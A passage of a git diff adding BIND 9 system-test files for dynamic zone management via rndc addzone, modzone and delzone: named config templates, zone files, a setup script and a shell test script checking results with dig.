a/bin/tests/system/addzone/ns2/named3.conf.in b/bin/tests/system/addzone/ns2/named3.conf.in new file mode 100644 index 0000000..697d279 --- /dev/null +++ b/bin/tests/system/addzone/ns2/named3.conf.in @@ -0,0 +1,77 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; 10.53.0.4; 10.53.0.5; }; + listen-on-v6 { none; }; + recursion no; + new-zones-directory "new-zones"; +}; + +view internal { + match-clients { 10.53.0.2; }; + allow-new-zones no; + recursion yes; + + response-policy { zone "policy"; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "policy" { + type primary; + file "normal.db"; + }; +}; + +view directory { + match-clients { 10.53.0.5; }; + allow-new-zones yes; + + zone "." { + type hint; + file "../../common/root.hint"; + }; +}; + +view external { + match-clients { any; }; + allow-new-zones yes; + + zone "." { + type hint; + file "../../common/root.hint"; + }; +}; + +# This view is only here to test that configuration context is cleaned +# up correctly when using multiple named ACLs (regression test for RT #22739) +acl match { none; }; +acl nobody { none; }; +view extra { + match-clients { match; }; + allow-new-zones yes; + allow-transfer { nobody; }; + allow-query { nobody; }; + allow-recursion { nobody; }; +}; diff --git a/bin/tests/system/addzone/ns2/normal.db b/bin/tests/system/addzone/ns2/normal.db new file mode 100644 index 0000000..fa05638 --- /dev/null +++ b/bin/tests/system/addzone/ns2/normal.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN normal.example. +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + MX 10 mail + +a A 10.0.0.1 +mail A 10.0.0.2 diff --git a/bin/tests/system/addzone/ns2/previous.db b/bin/tests/system/addzone/ns2/previous.db new file mode 100644 index 0000000..6d2e495 --- /dev/null +++ b/bin/tests/system/addzone/ns2/previous.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN previous.example. +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + MX 10 mail + +a A 10.0.0.1 +mail A 10.0.0.2 diff --git a/bin/tests/system/addzone/ns2/redirect.db.1 b/bin/tests/system/addzone/ns2/redirect.db.1 new file mode 100644 index 0000000..5dcdd1b --- /dev/null +++ b/bin/tests/system/addzone/ns2/redirect.db.1 @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 SOA . . 0 0 0 0 0 +@ 0 NS . diff --git a/bin/tests/system/addzone/ns2/redirect.db.2 b/bin/tests/system/addzone/ns2/redirect.db.2 new file mode 100644 index 0000000..4dcbdbc --- /dev/null +++ b/bin/tests/system/addzone/ns2/redirect.db.2 @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 SOA . . 1 0 0 0 0 +@ 0 NS . diff --git a/bin/tests/system/addzone/ns3/e.db b/bin/tests/system/addzone/ns3/e.db new file mode 100644 index 0000000..7f74f0a --- /dev/null +++ b/bin/tests/system/addzone/ns3/e.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ SOA ns3 hostmaster 0 0 0 0 0 +@ NS ns3 +ns3 A 10.53.0.3 diff --git a/bin/tests/system/addzone/ns3/example.db b/bin/tests/system/addzone/ns3/example.db new file mode 100644 index 0000000..2bf4f8d --- /dev/null +++ b/bin/tests/system/addzone/ns3/example.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ IN SOA localhost. localhost.localhost. 1 10800 3600 605800 86400 +@ IN NS localhost. diff --git a/bin/tests/system/addzone/ns3/named1.conf.in b/bin/tests/system/addzone/ns3/named1.conf.in new file mode 100644 index 0000000..f1488f4 --- /dev/null +++ b/bin/tests/system/addzone/ns3/named1.conf.in @@ -0,0 +1,37 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + allow-query { any; }; + recursion no; + allow-new-zones yes; +}; + +zone "." { + type primary; + file "redirect.db"; +}; + +primaries "test" { + 192.5.5.241; +}; diff --git a/bin/tests/system/addzone/ns3/named2.conf.in b/bin/tests/system/addzone/ns3/named2.conf.in new file mode 100644 index 0000000..3b56d64 --- /dev/null +++ b/bin/tests/system/addzone/ns3/named2.conf.in @@ -0,0 +1,28 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + allow-query { any; }; + recursion no; + allow-new-zones yes; +}; diff --git a/bin/tests/system/addzone/ns3/redirect.db.1 b/bin/tests/system/addzone/ns3/redirect.db.1 new file mode 100644 index 0000000..60a2622 --- /dev/null +++ b/bin/tests/system/addzone/ns3/redirect.db.1 @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 SOA . . 0 0 0 0 0 +@ 0 NS . +@ 0 A 127.0.0.1 diff --git a/bin/tests/system/addzone/ns3/redirect.db.2 b/bin/tests/system/addzone/ns3/redirect.db.2 new file mode 100644 index 0000000..3804fef --- /dev/null +++ b/bin/tests/system/addzone/ns3/redirect.db.2 @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 SOA . . 1 0 0 0 0 +@ 0 NS . +@ 0 A 127.0.0.1 diff --git a/bin/tests/system/addzone/setup.sh b/bin/tests/system/addzone/setup.sh new file mode 100644 index 0000000..0730553 --- /dev/null +++ b/bin/tests/system/addzone/setup.sh @@ -0,0 +1,26 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +cp -f ns1/redirect.db.1 ns1/redirect.db +cp -f ns2/redirect.db.1 ns2/redirect.db +cp -f ns3/redirect.db.1 ns3/redirect.db + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named1.conf.in ns2/named.conf +copy_setports ns3/named1.conf.in ns3/named.conf + +cp -f ns2/default.nzf.in ns2/3bf305731dd26307.nzf +mkdir ns2/new-zones diff --git a/bin/tests/system/addzone/tests.sh b/bin/tests/system/addzone/tests.sh new file mode 100755 index 0000000..b3e21c6 --- /dev/null +++ b/bin/tests/system/addzone/tests.sh @@ -0,0 +1,755 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +nosea +nostat +nocmd +norec +noques +noauth +noadd +nostats +dnssec -p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +check_zonestatus() ( + $RNDCCMD "10.53.0.$1" zonestatus -redirect > "zonestatus.out.ns$1.$n" && + grep "type: redirect" "zonestatus.out.ns$1.$n" > /dev/null && + grep "serial: 1" "zonestatus.out.ns$1.$n" > /dev/null +) + +status=0 +n=0 + +echo_i "checking normally loaded zone ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# When LMDB support is compiled in, this tests that migration from +# NZF to NZD occurs during named startup +echo_i "checking previously added zone ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 a.previous.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.previous.example' dig.out.ns2.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +if $FEATURETEST --with-lmdb; then + echo_i "checking that existing NZF file was renamed after migration ($n)" + [ -e ns2/3bf305731dd26307.nzf~ ] || ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +echo_i "adding new zone ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone 'added.example { type primary; file "added.db"; };' 2>&1 | sed 's/^/I:ns2 /' +_check_adding_new_zone () ( + $DIG $DIGOPTS @10.53.0.2 a.added.example a > dig.out.ns2.$n && + grep 'status: NOERROR' dig.out.ns2.$n > /dev/null && + grep '^a.added.example' dig.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_adding_new_zone || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +nextpart ns2/named.run >/dev/null +echo_i "checking addzone errors are logged correctly" +ret=0 +$RNDCCMD 10.53.0.2 addzone bad.example '{ type mister; };' 2>&1 | grep 'unexpected token' > /dev/null 2>&1 || ret=1 +wait_for_log_peek 20 "addzone: 'mister' unexpected" ns2/named.run || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +nextpart ns2/named.run >/dev/null +echo_i "checking modzone errors are logged correctly" +ret=0 +$RNDCCMD 10.53.0.2 modzone added.example '{ type mister; };' 2>&1 | grep 'unexpected token' > /dev/null 2>&1 || ret=1 +wait_for_log_peek 20 "modzone: 'mister' unexpected" ns2/named.run || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "adding a zone that requires quotes ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone '"32/1.0.0.127-in-addr.added.example" { +check-names ignore; type primary; file "added.db"; };' 2>&1 | sed 's/^/I:ns2 /' +_check_zone_that_requires_quotes() ( + $DIG $DIGOPTS @10.53.0.2 "a.32/1.0.0.127-in-addr.added.example" a > dig.out.ns2.$n && + grep 'status: NOERROR' dig.out.ns2.$n > /dev/null && + grep '^a.32/1.0.0.127-in-addr.added.example' dig.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_zone_that_requires_quotes || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "adding a zone with a quote in the name ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone '"foo\"bar.example" { check-names ignore; type primary; file "added.db"; };' 2>&1 | sed 's/^/I:ns2 /' +_check_zone_with_a_quote() ( + $DIG $DIGOPTS @10.53.0.2 "a.foo\"bar.example" a > dig.out.ns2.$n && + grep 'status: NOERROR' dig.out.ns2.$n > /dev/null && + grep '^a.foo\\"bar.example' dig.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_zone_with_a_quote || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "adding new zone with missing file ($n)" +ret=0 +$DIG $DIGOPTS +all @10.53.0.2 a.missing.example a > dig.out.ns2.pre.$n || ret=1 +grep "status: REFUSED" dig.out.ns2.pre.$n > /dev/null || ret=1 +$RNDCCMD 10.53.0.2 addzone 'missing.example { type primary; file "missing.db"; };' 2> rndc.out.ns2.$n +grep "file not found" rndc.out.ns2.$n > /dev/null || ret=1 +$DIG $DIGOPTS +all @10.53.0.2 a.missing.example a > dig.out.ns2.post.$n || ret=1 +grep "status: REFUSED" dig.out.ns2.post.$n > /dev/null || ret=1 +digcomp dig.out.ns2.pre.$n dig.out.ns2.post.$n || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +if ! $FEATURETEST --with-lmdb; then + echo_i "verifying no comments in NZF file ($n)" + ret=0 + hcount=`grep "^# New zone file for view: _default" ns2/3bf305731dd26307.nzf | wc -l` + [ $hcount -eq 0 ] || ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +echo_i "checking rndc showzone with previously added zone ($n)" +ret=0 +$RNDCCMD 10.53.0.2 showzone previous.example > rndc.out.ns2.$n +expected='zone "previous.example" { type primary; file "previous.db"; };' +[ "`cat rndc.out.ns2.$n`" = "$expected" ] || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +if $FEATURETEST --with-lmdb; then + echo_i "checking zone is present in NZD ($n)" + ret=0 + $NZD2NZF ns2/_default.nzd | grep previous.example > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +echo_i "deleting previously added zone ($n)" +ret=0 +$RNDCCMD 10.53.0.2 delzone previous.example 2>&1 | sed 's/^/I:ns2 /' +_check_deleting_previously_added_zone() ( + $DIG $DIGOPTS @10.53.0.2 a.previous.example a > dig.out.ns2.$n && + grep 'status: REFUSED' dig.out.ns2.$n > /dev/null && + ! grep '^a.previous.example' dig.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_deleting_previously_added_zone || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +check_nzd2nzf() ( + $NZD2NZF ns2/_default.nzd > nzd2nzf.out.$n && + ! grep previous.example nzd2nzf.out.$n > /dev/null +) + +if $FEATURETEST --with-lmdb; then + echo_i "checking zone was deleted from NZD ($n)" + retry_quiet 10 check_nzd2nzf || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +if ! $FEATURETEST --with-lmdb; then + echo_i "checking NZF file now has comment ($n)" + ret=0 + hcount=`grep "^# New zone file for view: _default" ns2/3bf305731dd26307.nzf | wc -l` + [ $hcount -eq 1 ] || ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +echo_i "deleting newly added zone added.example ($n)" +ret=0 +$RNDCCMD 10.53.0.2 delzone added.example 2>&1 | sed 's/^/I:ns2 /' +_check_deleting_newly_added_zone() ( + $DIG $DIGOPTS @10.53.0.2 a.added.example a > dig.out.ns2.$n && + grep 'status: REFUSED' dig.out.ns2.$n > /dev/null && + ! grep '^a.added.example' dig.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_deleting_newly_added_zone || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "deleting newly added zone with escaped quote ($n)" +ret=0 +$RNDCCMD 10.53.0.2 delzone "foo\\\"bar.example" 2>&1 | sed 's/^/I:ns2 /' +_check_deleting_newly_added_zone_quote() ( + $DIG $DIGOPTS @10.53.0.2 "a.foo\"bar.example" a > dig.out.ns2.$n && + grep 'status: REFUSED' dig.out.ns2.$n > /dev/null && + ! grep "^a.foo\"bar.example" dig.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_deleting_newly_added_zone_quote || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking rndc showzone with a normally-loaded zone ($n)" +ret=0 +$RNDCCMD 10.53.0.2 showzone normal.example > rndc.out.ns2.$n +expected='zone "normal.example" { type primary; file "normal.db"; };' +[ "`cat rndc.out.ns2.$n`" = "$expected" ] || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking rndc showzone with a normally-loaded zone with trailing dot ($n)" +ret=0 +$RNDCCMD 10.53.0.2 showzone finaldot.example > rndc.out.ns2.$n +expected='zone "finaldot.example." { type primary; file "normal.db"; };' +[ "`cat rndc.out.ns2.$n`" = "$expected" ] || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking rndc showzone with a normally-loaded redirect zone ($n)" +ret=0 +$RNDCCMD 10.53.0.1 showzone -redirect > rndc.out.ns1.$n +expected='zone "." { type redirect; file "redirect.db"; };' +[ "`cat rndc.out.ns1.$n`" = "$expected" ] || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking rndc zonestatus with a normally-loaded redirect zone ($n)" +ret=0 +$RNDCCMD 10.53.0.1 zonestatus -redirect > rndc.out.ns1.$n +grep "type: redirect" rndc.out.ns1.$n > /dev/null || ret=1 +grep "serial: 0" rndc.out.ns1.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking rndc reload with a normally-loaded redirect zone ($n)" +ret=0 +sleep 1 +cp -f ns1/redirect.db.2 ns1/redirect.db +$RNDCCMD 10.53.0.1 reload -redirect > rndc.out.ns1.$n +retry_quiet 5 check_zonestatus 1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "delete a normally-loaded zone ($n)" +ret=0 +$RNDCCMD 10.53.0.2 delzone normal.example > rndc.out.ns2.$n 2>&1 +grep "is no longer active and will be deleted" rndc.out.ns2.$n > /dev/null || ret=11 +grep "To keep it from returning when the server is restarted" rndc.out.ns2.$n > /dev/null || ret=1 +grep "must also be removed from named.conf." rndc.out.ns2.$n > /dev/null || ret=1 +_check_delete_normally_loaded_zone() ( + $DIG $DIGOPTS @10.53.0.2 a.normal.example a > dig.out.ns2.$n && + grep 'status: REFUSED' dig.out.ns2.$n > /dev/null +) +retry_quiet 5 _check_delete_normally_loaded_zone || ret=1 + +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "attempting to add primary zone with inline signing ($n)" +$RNDCCMD 10.53.0.2 addzone 'inline.example { type primary; file "inline.db"; inline-signing yes; };' 2>&1 | sed 's/^/I:ns2 /' +_check_add_primary_zone_with_inline() ( + $DIG $DIGOPTS @10.53.0.2 a.inline.example a > dig.out.ns2.$n && + grep 'status: NOERROR' dig.out.ns2.$n > /dev/null && + grep '^a.inline.example' dig.out.ns2.$n > /dev/null +) +retry_quiet 5 _check_add_primary_zone_with_inline || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "attempting to add primary zone with inline signing and missing file ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone 'inlinemissing.example { type primary; file "missing.db"; inline-signing yes; };' 2> rndc.out.ns2.$n +grep "file not found" rndc.out.ns2.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "attempting to add secondary zone with inline signing ($n)" +$RNDCCMD 10.53.0.2 addzone 'inlinesec.example { type secondary; primaries { 10.53.0.1; }; file "inlinesec.bk"; inline-signing yes; };' 2>&1 | sed 's/^/I:ns2 /' +_check_add_secondary_with_inline() ( + $DIG $DIGOPTS @10.53.0.2 a.inlinesec.example a > dig.out.ns2.$n && + grep 'status: NOERROR' dig.out.ns2.$n > /dev/null && + grep '^a.inlinesec.example' dig.out.ns2.$n > /dev/null +) +retry_quiet 5 _check_add_secondary_with_inline || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "attempting to delete secondary zone with inline signing ($n)" +ret=0 +retry_quiet 10 test -f ns2/inlinesec.bk.signed -a -f ns2/inlinesec.bk || ret=1 +$RNDCCMD 10.53.0.2 delzone inlinesec.example > rndc.out2.test$n 2>&1 || ret=1 +test -f inlinesec.bk || +grep '^inlinesec.bk$' rndc.out2.test$n > /dev/null || { + echo_i "failed to report inlinesec.bk"; ret=1; +} +test ! -f inlinesec.bk.signed || +grep '^inlinesec.bk.signed$' rndc.out2.test$n > /dev/null || { + echo_i "failed to report inlinesec.bk.signed"; ret=1; +} +n=`expr $n + 1` +status=`expr $status + $ret` + +echo_i "restoring secondary zone with inline signing ($n)" +$RNDCCMD 10.53.0.2 addzone 'inlinesec.example { type secondary; primaries { 10.53.0.1; }; file "inlinesec.bk"; inline-signing yes; };' 2>&1 | sed 's/^/I:ns2 /' +_check_restoring_secondary_with_inline() ( + $DIG $DIGOPTS @10.53.0.2 a.inlinesec.example a > dig.out.ns2.$n && + grep 'status: NOERROR' dig.out.ns2.$n > /dev/null && + grep '^a.inlinesec.example' dig.out.ns2.$n > /dev/null +) +retry_quiet 5 _check_restoring_secondary_with_inline || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "deleting secondary zone with automatic zone file removal ($n)" +ret=0 +retry_quiet 10 test -f ns2/inlinesec.bk.signed -a -f ns2/inlinesec.bk || ret=1 +$RNDCCMD 10.53.0.2 delzone -clean inlinesec.example > /dev/null 2>&1 +retry_quiet 10 test ! -f ns2/inlinesec.bk.signed -a ! -f ns2/inlinesec.bk +n=`expr $n + 1` +status=`expr $status + $ret` + +echo_i "modifying zone configuration ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone 'mod.example { type primary; file "added.db"; };' 2>&1 | sed 's/^/ns2 /' | cat_i +$DIG +norec $DIGOPTS @10.53.0.2 mod.example ns > dig.out.ns2.1.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.1.$n > /dev/null || ret=1 +$RNDCCMD 10.53.0.2 modzone 'mod.example { type primary; file "added.db"; allow-query { none; }; };' 2>&1 | sed 's/^/ns2 /' | cat_i +$DIG +norec $DIGOPTS @10.53.0.2 mod.example ns > dig.out.ns2.2.$n || ret=1 +$RNDCCMD 10.53.0.2 showzone mod.example | grep 'allow-query { "none"; };' > /dev/null 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that adding a 'stub' zone works ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone 'stub.example { type stub; primaries { 1.2.3.4; }; file "stub.example.bk"; };' > rndc.out.ns2.$n 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that adding a 'static-stub' zone works ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone 'static-stub.example { type static-stub; server-addresses { 1.2.3.4; }; };' > rndc.out.ns2.$n 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that adding a 'primary redirect' zone works ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone '"." { type redirect; file "redirect.db"; };' > rndc.out.ns2.$n 2>&1 || ret=1 +_check_add_primary_redirect() ( + $RNDCCMD 10.53.0.2 showzone -redirect > showzone.out.ns2.$n 2>&1 && + grep "type redirect;" showzone.out.ns2.$n > /dev/null && + $RNDCCMD 10.53.0.2 zonestatus -redirect > zonestatus.out.ns2.$n 2>&1 && + grep "type: redirect" zonestatus.out.ns2.$n > /dev/null && + grep "serial: 0" zonestatus.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_add_primary_redirect || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that reloading a added 'primary redirect' zone works ($n)" +ret=0 +sleep 1 +cp -f ns2/redirect.db.2 ns2/redirect.db +$RNDCCMD 10.53.0.2 reload -redirect > rndc.out.ns2.$n +retry_quiet 10 check_zonestatus 2 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that retransfer of a added 'primary redirect' zone fails ($n)" +ret=0 +$RNDCCMD 10.53.0.2 retransfer -redirect > rndc.out.ns2.$n 2>&1 && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that deleting a 'primary redirect' zone works ($n)" +ret=0 +$RNDCCMD 10.53.0.2 delzone -redirect > rndc.out.ns2.$n 2>&1 || ret=1 +_check_deleting_primary_redirect() ( + $RNDCCMD 10.53.0.2 showzone -redirect > showzone.out.ns2.$n 2>&1 || true + grep 'not found' showzone.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_deleting_primary_redirect || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that adding a 'secondary redirect' zone works ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone '"." { type redirect; primaries { 10.53.0.3;}; file "redirect.bk"; };' > rndc.out.ns2.$n 2>&1 || ret=1 +_check_adding_secondary_redirect() ( + $RNDCCMD 10.53.0.2 showzone -redirect > showzone.out.ns2.$n 2>&1 && + grep "type redirect;" showzone.out.ns2.$n > /dev/null && + $RNDCCMD 10.53.0.2 zonestatus -redirect > zonestatus.out.ns2.$n 2>&1 && + grep "type: redirect" zonestatus.out.ns2.$n > /dev/null && + grep "serial: 0" zonestatus.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_adding_secondary_redirect || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that retransfering a added 'secondary redirect' zone works ($n)" 